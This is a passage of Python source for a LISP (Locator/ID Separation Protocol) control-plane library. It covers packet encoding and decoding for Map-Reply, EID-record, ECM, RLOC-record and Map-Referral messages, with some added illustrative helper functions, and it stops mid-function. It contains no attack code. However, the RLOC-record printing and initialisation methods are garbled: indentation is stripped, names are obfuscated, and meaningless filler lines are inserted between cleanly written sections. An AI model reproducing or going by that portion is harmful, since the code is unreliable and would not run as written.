        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        return(True)
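
# Illustrative sketch (not part of the original module): the fixed header
# built by lisp_map_request.encode() above is one 32-bit flags word followed
# by a 64-bit nonce. This packs and re-parses the header for an SMR-invoked
# request with one record and one extra ITR-RLOC.
def _example_map_request_header():
    nonce = random.randint(0, (2**64) - 1)
    first_long = (LISP_MAP_REQUEST << 28) | 1     # record-count 1
    first_long |= (1 << 8)                        # itr-rloc-count ("+1" coded)
    first_long |= 0x00400000                      # the "I" (smr-invoked) bit
    header = struct.pack("I", socket.htonl(first_long))
    header += struct.pack("Q", nonce)

    # A receiver recovers the same fields, as lisp_map_request.decode() does.
    parsed = socket.ntohl(struct.unpack("I", header[:4])[0])
    assert (parsed >> 28) == LISP_MAP_REQUEST
    assert ((parsed >> 8) & 0x1f) == 1 and (parsed & 0xff) == 1
    assert (parsed & 0x00400000) != 0
    return(header)
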
class lisp_map_reply(object):
    def __init__(self):
        self.rloc_probe = False
        self.echo_nonce_capable = False
        self.security = False
        self.record_count = 0
        self.hop_count = 0
        self.nonce = 0
        self.keys = None

    def print_map_reply(self):
        line = ("{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " +
            "nonce: 0x{}")
        lprint(line.format(bold("Map-Reply", False),
            "R" if self.rloc_probe else "r",
            "E" if self.echo_nonce_capable else "e",
            "S" if self.security else "s", self.hop_count, self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        first_long = (LISP_MAP_REPLY << 28) | self.record_count
        first_long |= self.hop_count << 8
        if (self.rloc_probe): first_long |= 0x08000000
        if (self.echo_nonce_capable): first_long |= 0x04000000
        if (self.security): first_long |= 0x02000000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        first_long = socket.ntohl(first_long)
        self.rloc_probe = True if (first_long & 0x08000000) else False
        self.echo_nonce_capable = True if (first_long & 0x04000000) else False
        self.security = True if (first_long & 0x02000000) else False
        self.hop_count = (first_long >> 8) & 0xff
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        # If we initiated a key-exchange with this nonce, pick up the keys.
        if (self.nonce in lisp_crypto_keys_by_nonce):
            self.keys = lisp_crypto_keys_by_nonce[self.nonce]
            self.keys[1].delete_key_by_nonce(self.nonce)
        return(packet)
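
# Illustrative sketch (not part of the original module): Map-Reply reuses the
# first-long layout but carries a hop-count in bits 8-15. A probe reply with
# hop-count 3, two EID-records, and the R-bit set round-trips like this.
def _example_map_reply_header():
    first_long = (LISP_MAP_REPLY << 28) | (3 << 8) | 2
    first_long |= 0x08000000                      # R (rloc-probe) bit

    header = struct.pack("I", socket.htonl(first_long))
    parsed = socket.ntohl(struct.unpack("I", header[:4])[0])
    assert ((parsed >> 8) & 0xff) == 3
    assert (parsed & 0xff) == 2 and (parsed & 0x08000000) != 0
    return(header)
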
class lisp_eid_record(object):
    def __init__(self):
        self.record_ttl = 0
        self.rloc_count = 0
        self.action = 0
        self.authoritative = False
        self.ddt_incomplete = False
        self.signature_count = 0
        self.map_version = 0
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def print_prefix(self):
        if (self.group.is_null()):
            return(green(self.eid.print_prefix(), False))
        return(green(self.eid.print_sg(self.group), False))

    def print_ttl(self):

        # The record-ttl is in minutes unless the high-order bit is set,
        # in which case the low 31 bits are in seconds.
        ttl = self.record_ttl
        if (self.record_ttl & 0x80000000):
            ttl = str(self.record_ttl & 0x7fffffff) + " secs"
        elif ((ttl % 60) == 0):
            ttl = str(old_div(ttl, 60)) + " hours"
        else:
            ttl = str(ttl) + " mins"

        return(ttl)

    def store_ttl(self):

        # Return the TTL in seconds.
        ttl = self.record_ttl * 60
        if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
        return(ttl)

    def print_record(self, indent, ddt):
        incomplete = ""
        sig_count = ""
        action_str = bold("invalid-action", False)
        if (ddt):
            if (self.action < len(lisp_map_referral_action_string)):
                action_str = lisp_map_referral_action_string[self.action]
                action_str = bold(action_str, False)
            incomplete = (", " + bold("ddt-incomplete", False)) if \
                self.ddt_incomplete else ""
            sig_count = (", sig-count: " + str(self.signature_count)) if \
                (self.signature_count != 0) else ""
        else:
            if (self.action < len(lisp_map_reply_action_string)):
                action_str = lisp_map_reply_action_string[self.action]
                if (self.action != LISP_NO_ACTION):
                    action_str = bold(action_str, False)

        afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
        line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
            "{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")

        lprint(line.format(indent, self.print_ttl(), self.rloc_count,
            action_str, "auth" if (self.authoritative is True) else "non-auth",
            incomplete, sig_count, self.map_version, afi,
            green(self.print_prefix(), False)))

    def encode(self):
        action = self.action << 13
        if (self.authoritative): action |= 0x1000
        if (self.ddt_incomplete): action |= 0x800

        afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
        if (afi < 0): afi = LISP_AFI_LCAF
        sg = (self.group.is_null() == False)
        if (sg): afi = LISP_AFI_LCAF

        version = (self.signature_count << 12) | self.map_version
        mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len

        packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
            self.rloc_count, mask_len, socket.htons(action),
            socket.htons(version), socket.htons(afi))

        # An (S,G) EID is encoded in a Multicast-Info LCAF.
        if (sg):
            packet += self.eid.lcaf_encode_sg(self.group)
            return(packet)

        # A geo-prefix EID replaces the AFI with a Geo-Coordinates LCAF.
        if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
            packet = packet[0:-2]
            packet += self.eid.address.encode_geo()
            return(packet)

        # A non-zero instance-id is encoded in an Instance-ID LCAF.
        if (afi == LISP_AFI_LCAF):
            packet += self.eid.lcaf_encode_iid()
            return(packet)

        packet += self.eid.pack_address()
        return(packet)

    def decode(self, packet):
        packet_format = "IBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
            self.map_version, self.eid.afi = \
            struct.unpack(packet_format, packet[:format_size])

        self.record_ttl = socket.ntohl(self.record_ttl)
        action = socket.ntohs(action)
        self.action = (action >> 13) & 0x7
        self.authoritative = True if ((action >> 12) & 1) else False
        self.ddt_incomplete = True if ((action >> 11) & 1) else False
        self.map_version = socket.ntohs(self.map_version)
        self.signature_count = self.map_version >> 12
        self.map_version = self.map_version & 0xfff
        self.eid.afi = socket.ntohs(self.eid.afi)
        self.eid.instance_id = 0
        packet = packet[format_size::]

        # An LCAF-encoded EID carries an instance-id, (S,G), or geo-prefix.
        if (self.eid.afi == LISP_AFI_LCAF):
            packet, group = self.eid.lcaf_decode_eid(packet)
            if (group): self.group = group
            self.group.instance_id = self.eid.instance_id
            return(packet)

        packet = self.eid.unpack_address(packet)
        return(packet)

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
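
# Illustrative sketch (not part of the original module): EID-record TTLs are
# carried in minutes, and setting the high-order bit reinterprets the low 31
# bits as seconds, matching print_ttl()/store_ttl() above.
def _example_eid_record_ttl():
    minutes = lisp_eid_record()
    minutes.record_ttl = 2                        # plain value: 2 minutes
    seconds = lisp_eid_record()
    seconds.record_ttl = 0x80000000 | 90          # flagged value: 90 seconds

    assert minutes.store_ttl() == 120             # store_ttl() returns seconds
    assert seconds.store_ttl() == 90
    return(minutes.print_ttl(), seconds.print_ttl())
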
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm(object):
    def __init__(self, sport):
        self.security = False
        self.ddt = False
        self.to_etr = False
        self.to_ms = False
        self.length = 0
        self.ttl = LISP_DEFAULT_ECM_TTL
        self.protocol = LISP_UDP_PROTOCOL
        self.ip_checksum = 0
        self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.udp_sport = sport
        self.udp_dport = LISP_CTRL_PORT
        self.udp_checksum = 0
        self.udp_length = 0
        self.afi = LISP_AFI_NONE

    def print_ecm(self):
        line = ("{} -> flags: {}{}{}{}, " +
            "inner IP: {} -> {}, inner UDP: {} -> {}")
        lprint(line.format(bold("ECM", False), "S" if self.security else "s",
            "D" if self.ddt else "d", "E" if self.to_etr else "e",
            "M" if self.to_ms else "m",
            green(self.source.print_address(), False),
            green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))

    def encode(self, packet, inner_source, inner_dest):
        self.udp_length = len(packet) + 8
        self.source = inner_source
        self.dest = inner_dest
        if (inner_dest.is_ipv4()):
            self.afi = LISP_AFI_IPV4
            self.length = self.udp_length + 20
        if (inner_dest.is_ipv6()):
            self.afi = LISP_AFI_IPV6
            self.length = self.udp_length

        # Build the 4-byte ECM header.
        first_long = (LISP_ECM << 28)
        if (self.security): first_long |= 0x08000000
        if (self.ddt): first_long |= 0x04000000
        if (self.to_etr): first_long |= 0x02000000
        if (self.to_ms): first_long |= 0x01000000

        ecm = struct.pack("I", socket.htonl(first_long))

        # Build the inner IPv4 or IPv6 header.
        ip = ""
        if (self.afi == LISP_AFI_IPV4):
            ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
                0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
            ip += self.source.pack_address()
            ip += self.dest.pack_address()
            ip = lisp_ip_checksum(ip)

        if (self.afi == LISP_AFI_IPV6):
            ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
                self.protocol, self.ttl)
            ip += self.source.pack_address()
            ip += self.dest.pack_address()

        # Build the inner UDP header.
        sport = socket.htons(self.udp_sport)
        dport = socket.htons(self.udp_dport)
        udp_len = socket.htons(self.udp_length)
        checksum = socket.htons(self.udp_checksum)
        udp = struct.pack("HHHH", sport, dport, udp_len, checksum)
        return(ecm + ip + udp)

    def decode(self, packet):

        # Decode the ECM header flags.
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])

        first_long = socket.ntohl(first_long[0])
        self.security = True if (first_long & 0x08000000) else False
        self.ddt = True if (first_long & 0x04000000) else False
        self.to_etr = True if (first_long & 0x02000000) else False
        self.to_ms = True if (first_long & 0x01000000) else False
        packet = packet[format_size::]

        # The version nibble of the inner IP header selects IPv4 or IPv6.
        if (len(packet) < 1): return(None)
        version = struct.unpack("B", packet[0:1])[0]
        version = version >> 4

        if (version == 4):
            format_size = struct.calcsize("HHIBBH")
            if (len(packet) < format_size): return(None)

            x, length, x, ttl, protocol, checksum = struct.unpack("HHIBBH",
                packet[:format_size])
            self.length = socket.ntohs(length)
            self.ttl = ttl
            self.protocol = protocol
            self.ip_checksum = socket.ntohs(checksum)
            self.source.afi = self.dest.afi = LISP_AFI_IPV4

            # Zero out the IPv4 header checksum field.
            zero = struct.pack("H", 0)
            checksum_offset = struct.calcsize("HHIBB")
            checksum_size = struct.calcsize("H")
            packet = packet[:checksum_offset] + zero + \
                packet[checksum_offset + checksum_size:]

            packet = packet[format_size::]
            packet = self.source.unpack_address(packet)
            if (packet == None): return(None)
            packet = self.dest.unpack_address(packet)
            if (packet == None): return(None)

        if (version == 6):
            format_size = struct.calcsize("IHBB")
            if (len(packet) < format_size): return(None)

            x, length, protocol, ttl = struct.unpack("IHBB",
                packet[:format_size])
            self.length = socket.ntohs(length)
            self.protocol = protocol
            self.ttl = ttl
            self.source.afi = self.dest.afi = LISP_AFI_IPV6

            packet = packet[format_size::]
            packet = self.source.unpack_address(packet)
            if (packet == None): return(None)
            packet = self.dest.unpack_address(packet)
            if (packet == None): return(None)

        self.source.mask_len = self.source.host_mask_len()
        self.dest.mask_len = self.dest.host_mask_len()

        # Decode the inner UDP header.
        format_size = struct.calcsize("HHHH")
        if (len(packet) < format_size): return(None)

        sport, dport, length, checksum = struct.unpack("HHHH",
            packet[:format_size])
        self.udp_sport = socket.ntohs(sport)
        self.udp_dport = socket.ntohs(dport)
        self.udp_length = socket.ntohs(length)
        self.udp_checksum = socket.ntohs(checksum)
        packet = packet[format_size::]
        return(packet)
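
# Illustrative sketch (not part of the original module): lisp_ecm.encode()
# prepends a 4-byte ECM header, a 20-byte inner IPv4 header, and an 8-byte
# inner UDP header, so an IPv4-encapsulated control message grows by 32
# bytes. The lisp_address calls assume the (afi, address-string, mask-length,
# instance-id) constructor used throughout this file; the addresses are
# placeholders.
def _example_ecm_overhead():
    inner = b"x" * 40                             # stand-in control message
    source = lisp_address(LISP_AFI_IPV4, "10.0.0.1", 32, 0)
    dest = lisp_address(LISP_AFI_IPV4, "10.0.0.2", 32, 0)

    ecm = lisp_ecm(LISP_CTRL_PORT)
    headers = ecm.encode(inner, source, dest)
    assert len(headers) == 4 + 20 + 8             # ECM + inner IPv4 + inner UDP
    assert ecm.length == len(inner) + 8 + 20      # inner IPv4 total length
    return(headers + inner)
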
class lisp_rloc_record ( object ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oOo = self . rloc_name
if ( cour ) : oOo = lisp_print_cour ( oOo )
return ( 'rloc-name: {}' . format ( blue ( oOo , cour ) ) )
def print_record ( self , indent ) :
o00oO = self . print_rloc_name ( )
if ( o00oO != "" ) : o00oO = ", " + o00oO
oOIIi = ""
if ( self . geo ) :
ooO0o = ""
if ( self . geo . geo_name ) : ooO0o = "'{}' " . format ( self . geo . geo_name )
oOIIi = ", geo: {}{}" . format ( ooO0o , self . geo . print_geo ( ) )
iIII1Iiii = ""
if ( self . elp ) :
ooO0o = ""
if ( self . elp . elp_name ) : ooO0o = "'{}' " . format ( self . elp . elp_name )
iIII1Iiii = ", elp: {}{}" . format ( ooO0o , self . elp . print_elp ( True ) )
if 2 - 2: Ii1I . iII111i + OoOoOO00 / IiII - I1IiiI % I1IiiI
IIIi1iI1 = ""
if ( self . rle ) :
ooO0o = ""
if ( self . rle . rle_name ) : ooO0o = "'{}' " . format ( self . rle . rle_name )
IIIi1iI1 = ", rle: {}{}" . format ( ooO0o , self . rle . print_rle ( False ,
True ) )
if 21 - 21: OOooOOo % O0 / I11i
IiiiIiii = ""
if ( self . json ) :
ooO0o = ""
if ( self . json . json_name ) :
ooO0o = "'{}' " . format ( self . json . json_name )
if 76 - 76: i1IIi
IiiiIiii = ", json: {}" . format ( self . json . print_json ( False ) )
if 38 - 38: I1IiiI
if 15 - 15: o0oOOo0O0Ooo
ooOo = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
ooOo = ", " + self . keys [ 1 ] . print_keys ( )
if 74 - 74: o0oOOo0O0Ooo % oO0o % iII111i / I1ii11iIi11i / O0 % I1Ii111
if 48 - 48: i11iIiiIii + I11i
i11 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( i11 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , o00oO , oOIIi ,
iIII1Iiii , IIIi1iI1 , IiiiIiii , ooOo ) )
if 60 - 60: OoOoOO00 + i11iIiiIii
if 3 - 3: II111iiii
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
    def store_rloc_entry(self, rloc_entry):
        rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
            else rloc_entry.translated_rloc

        self.rloc.copy_address(rloc)

        if (rloc_entry.rloc_name):
            self.rloc_name = rloc_entry.rloc_name

        if (rloc_entry.geo):
            self.geo = rloc_entry.geo
        else:
            name = rloc_entry.geo_name
            if (name and name in lisp_geo_list):
                self.geo = lisp_geo_list[name]

        if (rloc_entry.elp):
            self.elp = rloc_entry.elp
        else:
            name = rloc_entry.elp_name
            if (name and name in lisp_elp_list):
                self.elp = lisp_elp_list[name]

        if (rloc_entry.rle):
            self.rle = rloc_entry.rle
        else:
            name = rloc_entry.rle_name
            if (name and name in lisp_rle_list):
                self.rle = lisp_rle_list[name]

        if (rloc_entry.json):
            self.json = rloc_entry.json
        else:
            name = rloc_entry.json_name
            if (name and name in lisp_json_list):
                self.json = lisp_json_list[name]

        self.priority = rloc_entry.priority
        self.weight = rloc_entry.weight
        self.mpriority = rloc_entry.mpriority
        self.mweight = rloc_entry.mweight

    def encode_json(self, lisp_json):
        json_string = lisp_json.json_string
        key_id = 0
        if (lisp_json.json_encrypted):
            key_id = (lisp_json.json_key_id << 5) | 0x02

        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        addr_len = self.rloc.addr_length() + 2

        lcaf_len = socket.htons(len(json_string) + addr_len)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, key_id,
            lcaf_len, json_len)
        packet += json_string.encode()

        #
        # Append the RLOC address only for telemetry JSON; otherwise an
        # AFI of 0 follows the JSON string.
        #
        if (lisp_is_json_telemetry(json_string)):
            packet += struct.pack("H", socket.htons(self.rloc.afi))
            packet += self.rloc.pack_address()
        else:
            packet += struct.pack("H", 0)

        return(packet)

    def encode_lcaf(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        geo_lcaf = b""
        if (self.geo):
            geo_lcaf = self.geo.encode_geo()

        elp_lcaf = b""
        if (self.elp):
            elp_nodes = b""
            for elp_node in self.elp.elp_nodes:
                afi = socket.htons(elp_node.address.afi)
                flags = 0
                if (elp_node.eid): flags |= 0x4
                if (elp_node.probe): flags |= 0x2
                if (elp_node.strict): flags |= 0x1
                flags = socket.htons(flags)
                elp_nodes += struct.pack("HH", flags, afi)
                elp_nodes += elp_node.address.pack_address()

            elp_len = socket.htons(len(elp_nodes))
            elp_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_ELP_TYPE, 0, elp_len)
            elp_lcaf += elp_nodes

        rle_lcaf = b""
        if (self.rle):
            rle_nodes = b""
            for rle_node in self.rle.rle_nodes:
                afi = socket.htons(rle_node.address.afi)
                rle_nodes += struct.pack("HBBH", 0, 0, rle_node.level, afi)
                rle_nodes += rle_node.address.pack_address()
                if (rle_node.rloc_name):
                    rle_nodes += struct.pack("H", socket.htons(LISP_AFI_NAME))
                    rle_nodes += (rle_node.rloc_name + "\0").encode()

            rle_len = socket.htons(len(rle_nodes))
            rle_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_RLE_TYPE, 0, rle_len)
            rle_lcaf += rle_nodes

        json_lcaf = b""
        if (self.json):
            json_lcaf = self.encode_json(self.json)

        sec_lcaf = b""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            sec_lcaf = self.keys[1].encode_lcaf(self.rloc)

        name = b""
        if (self.rloc_name):
            name += struct.pack("H", socket.htons(LISP_AFI_NAME))
            name += (self.rloc_name + "\0").encode()

        lcaf_len = len(geo_lcaf) + len(elp_lcaf) + len(rle_lcaf) + \
            len(sec_lcaf) + 2 + len(json_lcaf) + self.rloc.addr_length() + \
            len(name)

        lcaf_len = socket.htons(lcaf_len)
        lcaf = struct.pack("HBBBBHH", lcaf_afi, 0, 0,
            LISP_LCAF_AFI_LIST_TYPE, 0, lcaf_len,
            socket.htons(self.rloc.afi))
        lcaf += self.rloc.pack_address()
        return(lcaf + name + geo_lcaf + elp_lcaf + rle_lcaf + sec_lcaf +
            json_lcaf)

    def encode(self):
        flags = 0
        if (self.local_bit): flags |= 0x0004
        if (self.probe_bit): flags |= 0x0002
        if (self.reach_bit): flags |= 0x0001

        packet = struct.pack("BBBBHH", self.priority, self.weight,
            self.mpriority, self.mweight, socket.htons(flags),
            socket.htons(self.rloc.afi))

        if (self.geo or self.elp or self.rle or self.keys or
            self.rloc_name or self.json):
            try:
                packet = packet[0:-2] + self.encode_lcaf()
            except:
                lprint("Could not encode LCAF for RLOC-record")
        else:
            packet += self.rloc.pack_address()

        return(packet)

    def decode_lcaf(self, packet, nonce, ms_json_encrypt):
        packet_format = "HBBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
            struct.unpack(packet_format, packet[:format_size])

        lcaf_len = socket.ntohs(lcaf_len)
        packet = packet[format_size::]
        if (lcaf_len > len(packet)): return(None)

        #
        # Process each LCAF type.
        #
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
            while (lcaf_len > 0):
                packet_format = "H"
                format_size = struct.calcsize(packet_format)
                if (lcaf_len < format_size): return(None)

                packet_len = len(packet)
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                afi = socket.ntohs(afi)

                if (afi == LISP_AFI_LCAF):
                    packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
                    if (packet == None): return(None)
                else:
                    packet = packet[format_size::]
                    self.rloc_name = None
                    if (afi == LISP_AFI_NAME):
                        packet, name = lisp_decode_dist_name(packet)
                        self.rloc_name = name
                    else:
                        self.rloc.afi = afi
                        packet = self.rloc.unpack_address(packet)
                        if (packet == None): return(None)
                        self.rloc.mask_len = self.rloc.host_mask_len()

                lcaf_len -= packet_len - len(packet)

        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):

            #
            # Decode geo-coordinates.
            #
            geo = lisp_geo("")
            packet = geo.decode_geo(packet, lcaf_len, rsvd2)
            if (packet == None): return(None)
            self.geo = geo

        elif (lcaf_type == LISP_LCAF_JSON_TYPE):
            encrypted_bit = rsvd2 & 0x02

            #
            # Decode JSON string length and string.
            #
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (lcaf_len < format_size): return(None)

            json_len = struct.unpack(packet_format, packet[:format_size])[0]
            json_len = socket.ntohs(json_len)
            if (lcaf_len < format_size + json_len): return(None)

            packet = packet[format_size::]
            self.json = lisp_json("", packet[0:json_len], encrypted_bit,
                ms_json_encrypt)
            packet = packet[json_len::]

            #
            # An RLOC address follows only for telemetry JSON.
            #
            afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
            packet = packet[2::]

            if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
                self.rloc.afi = afi
                packet = self.rloc.unpack_address(packet)

        elif (lcaf_type == LISP_LCAF_ELP_TYPE):

            #
            # Decode ELP nodes.
            #
            elp = lisp_elp(None)
            elp.elp_nodes = []
            while (lcaf_len > 0):
                flags, afi = struct.unpack("HH", packet[:4])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                elp_node = lisp_elp_node()
                elp.elp_nodes.append(elp_node)

                flags = socket.ntohs(flags)
                elp_node.eid = (flags & 0x4)
                elp_node.probe = (flags & 0x2)
                elp_node.strict = (flags & 0x1)
                elp_node.address.afi = afi
                elp_node.address.mask_len = elp_node.address.host_mask_len()
                packet = elp_node.address.unpack_address(packet[4::])
                lcaf_len -= elp_node.address.addr_length() + 4

            elp.select_elp_node()
            self.elp = elp

        elif (lcaf_type == LISP_LCAF_RLE_TYPE):

            #
            # Decode RLE nodes.
            #
            rle = lisp_rle(None)
            rle.rle_nodes = []
            while (lcaf_len > 0):
                rsvd, flags, level, afi = struct.unpack("HBBH", packet[:6])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                rle_node = lisp_rle_node()
                rle.rle_nodes.append(rle_node)

                rle_node.level = level
                rle_node.address.afi = afi
                rle_node.address.mask_len = rle_node.address.host_mask_len()
                packet = rle_node.address.unpack_address(packet[6::])

                lcaf_len -= rle_node.address.addr_length() + 6
                if (lcaf_len >= 2):
                    afi = struct.unpack("H", packet[:2])[0]
                    if (socket.ntohs(afi) == LISP_AFI_NAME):
                        packet = packet[2::]
                        packet, rle_node.rloc_name = \
                            lisp_decode_dist_name(packet)

                        if (packet == None): return(None)
                        lcaf_len -= len(rle_node.rloc_name) + 1 + 2

            self.rle = rle
            self.rle.build_forwarding_list()

        elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):

            #
            # Decode security parameters to obtain the remote public-key
            # of the encapsulator.
            #
            orig_packet = packet
            decode_key = lisp_keys(1)
            packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
            if (packet == None): return(None)

            #
            # Select the cipher suite the remote side wants to use.
            #
            cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
            if (decode_key.cipher_suite in cs_list):
                if (decode_key.cipher_suite == LISP_CS_25519_CBC):
                    key = lisp_keys(1, do_poly=False, do_chacha=False)

                if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
                    key = lisp_keys(1, do_poly=True, do_chacha=True)
            else:
                key = lisp_keys(1, do_poly=False, do_chacha=False)

            packet = key.decode_lcaf(orig_packet, lcaf_len, False)
            if (packet == None): return(None)

            if (len(packet) < 2): return(None)
            afi = struct.unpack("H", packet[:2])[0]
            self.rloc.afi = socket.ntohs(afi)
            if (len(packet) < self.rloc.addr_length()): return(None)
            packet = self.rloc.unpack_address(packet[2::])
            if (packet == None): return(None)
            self.rloc.mask_len = self.rloc.host_mask_len()

            #
            # No keying material accompanies a null RLOC address.
            #
            if (self.rloc.is_null()): return(packet)

            rloc_name_str = self.rloc_name
            if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)

            #
            # Decide whether the received keying material replaces any
            # stored keys.
            #
            stored_key = self.keys[1] if self.keys else None
            if (stored_key == None):
                if (key.remote_public_key == None):
                    string = bold("No remote encap-public-key supplied",
                        False)
                    lprint("    {} for {}".format(string, rloc_name_str))
                    key = None
                else:
                    string = bold("New encap-keying with new state", False)
                    lprint("    {} for {}".format(string, rloc_name_str))
                    key.compute_shared_key("encap")

            #
            # If the remote public keys match, keep the stored keys; if
            # they differ, the remote side has rekeyed.
            #
            if (stored_key):
                if (key.remote_public_key == None):
                    key = None
                    string = bold("Remote encap-unkeying occurred", False)
                    lprint("    {} for {}".format(string, rloc_name_str))
                elif (stored_key.compare_keys(key)):
                    key = stored_key
                    lprint("    Maintain stored encap-keys for {}".format( \
                        rloc_name_str))
                else:
                    if (stored_key.remote_public_key == None):
                        string = "New encap-keying for existing state"
                    else:
                        string = "Remote encap-rekeying"

                    lprint("    {} for {}".format(bold(string, False),
                        rloc_name_str))
                    stored_key.remote_public_key = key.remote_public_key
                    stored_key.compute_shared_key("encap")
                    key = stored_key

            self.keys = [None, key, None, None]

        else:

            #
            # Unknown LCAF type, skip over it.
            #
            packet = packet[lcaf_len::]

        return(packet)

    def decode(self, packet, nonce, ms_json_encrypt=False):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.priority, self.weight, self.mpriority, self.mweight, flags, \
            afi = struct.unpack(packet_format, packet[:format_size])

        flags = socket.ntohs(flags)
        afi = socket.ntohs(afi)
        self.local_bit = True if (flags & 0x0004) else False
        self.probe_bit = True if (flags & 0x0002) else False
        self.reach_bit = True if (flags & 0x0001) else False

        if (afi == LISP_AFI_LCAF):
            packet = packet[format_size - 2::]
            packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
        else:
            self.rloc.afi = afi
            packet = packet[format_size::]
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()

        return(packet)

    def end_of_rlocs(self, packet, rloc_count):
        for i in range(rloc_count):
            packet = self.decode(packet, None, False)
            if (packet == None): return(None)

        return(packet)

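#
# Illustrative sketch only (added for exposition, not part of the LISP
# processing path): round-trip the fixed 8-byte RLOC-record header that
# lisp_rloc_record.encode()/decode() above use. The priority/weight
# values are invented; the helper name _rloc_record_header_demo is
# hypothetical and the function is never called by this module.
#
def _rloc_record_header_demo():
    import struct
    import socket

    # Pack priority, weight, mpriority, mweight, flags, and AFI the same
    # way encode() does, then unpack and test the local bit (0x0004).
    header = struct.pack("BBBBHH", 1, 100, 255, 0, socket.htons(0x0004),
        socket.htons(LISP_AFI_IPV4))
    p, w, mp, mw, flags, afi = struct.unpack("BBBBHH", header)
    return((socket.ntohs(flags) & 0x0004) != 0)
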
#
# lisp_map_referral
#
# Header of a Map-Referral message used by the LISP-DDT mapping system.
#
class lisp_map_referral(object):
    def __init__(self):
        self.record_count = 0
        self.nonce = 0

    def print_map_referral(self):
        lprint("{} -> record-count: {}, nonce: 0x{}".format( \
            bold("Map-Referral", False), self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
